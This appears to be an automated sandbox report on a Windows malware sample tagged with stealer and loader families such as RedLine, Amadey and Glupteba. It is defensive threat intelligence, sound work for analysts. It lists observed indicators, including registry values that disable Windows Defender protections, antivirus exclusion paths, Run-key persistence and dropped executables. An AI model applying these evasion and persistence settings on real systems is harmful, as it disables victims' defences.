Malware Analysis Report

2025-01-23 11:28

Sample ID 231010-zt6j9sch55
Target f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008
SHA256 f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan lutyr magia
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008

Threat Level: Known bad

The file f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008 was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan lutyr magia

SectopRAT

SectopRAT payload

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine payload

Detects Healer an antivirus disabler dropper

Amadey

Glupteba

Windows security bypass

Modifies Windows Defender Real-time Protection settings

DcRat

Glupteba payload

Detected google phishing page

SmokeLoader

Healer

RedLine

Drops file in Drivers directory

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Checks computer location settings

Loads dropped DLL

Windows security modification

Reads user/profile data of web browsers

Executes dropped EXE

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of UnmapMainImage

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Enumerates system info in registry

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 21:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 21:01

Reported

2023-10-10 21:50

Platform

win7-20230831-en

Max time kernel

142s

Max time network

182s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Detected google phishing page

phishing google

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\6397.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\6397.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\6397.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\6397.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\6397.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\6397.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\531F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5707.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\590B.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6126.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6397.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67BD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CE8C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D928.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DE09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\jjfrwhh N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\531F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\531F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67BD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A598.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\6397.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\6397.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\531F.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2176 set thread context of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20231010214932.cab C:\Windows\system32\makecab.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f908080c5c8cf442941c5db076e34ac20000000002000000000010660000000100002000000040f8c1d83ce91a570c010e41064049d5b36a5b85d90940ddf5a21dddfc4a5bcd000000000e80000000020000200000008cdf96898de8cbfde09d941354d6f8d3481b02d5811d28c9bb1b4a89a145886890000000f645076fb115d5c24c4fc73d0ef4027dfc1df2a2419c3113c7f4f57da2282cc85e09baf4def87bc26afc793aa0aad98c1d6442cecda81a48254a6590b8fe18d490e260829de3207e5f31c05d800dddd4a632aeeeee7b27f65e313ab72af853a7d83f9f103dd3ba644a26cedf037342788698edefbd191ee0f45824451c45130f0535574c69f4f55e604f8fcd981a61fc400000000ccd4055f7a96bae6cad58d3fa73ccf66fa72877b3deadf998ca2484f402c6e7dc7d989bf4769db8da236c64852d817917d6913692f68f2b6e6832012f84ae59 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D00D2801-67B6-11EE-A42E-EEDB236BE57B} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
